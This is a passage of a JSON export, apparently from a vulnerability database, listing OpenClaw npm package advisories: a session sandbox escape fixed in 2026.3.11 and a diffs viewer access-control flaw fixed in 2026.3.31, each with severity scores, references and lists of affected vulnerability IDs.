model override.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. Session visibility checks now enforce the sandbox boundary before reading or mutating session state.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32918","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04354","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04364","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04375","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32918"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wcxr-59v9-rxr8","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T14:13:12Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wcxr-59v9-rxr8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32918","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32918"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-session-sandbox-escape-via-session-status-tool","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T14:13:12Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-session-sandbox-escape-via-session-status-tool"},{"reference_url":"https://github.com/advisories/GHSA-wcxr-59v9-rxr8","reference_id":"GHSA-wcxr-59v9-rxr8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wcxr-59v9-rxr8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32918","GHSA-wcxr-59v9-rxr8"],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w8sb-7ymy-wkez"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90188?format=json","vulnerability_id":"VCID-watb-49vx-yub1","summary":"OpenClaw: diffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled\n## Summary\ndiffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 misclassified proxied diff-viewer requests as local loopback in some cases, a real but low-severity access-control flaw.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `30a1690323088fd291abd11643a264a6828a002c` — 2026-03-30T14:17:27-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41403","reference_id":"","reference_type":"","scores":[{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19093","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19134","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19137","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41403"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/30a1690323088fd291abd11643a264a6828a002c","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/"}],"url":"https://github.com/openclaw/openclaw/commit/30a1690323088fd291abd11643a264a6828a002c"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3xv9-89fm-7h4r","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3xv9-89fm-7h4r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41403","reference_id":"","reference_type":"","scores":[{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41403"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-access-control-bypass-via-proxied-remote-request-misclassification","reference_id":"","reference_type":"","scores":[{"value":"2.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-access-control-bypass-via-proxied-remote-request-misclassification"},{"reference_url":"https://github.com/advisories/GHSA-3xv9-89fm-7h4r","reference_id":"GHSA-3xv9-89fm-7h4r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3xv9-89fm-7h4r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2p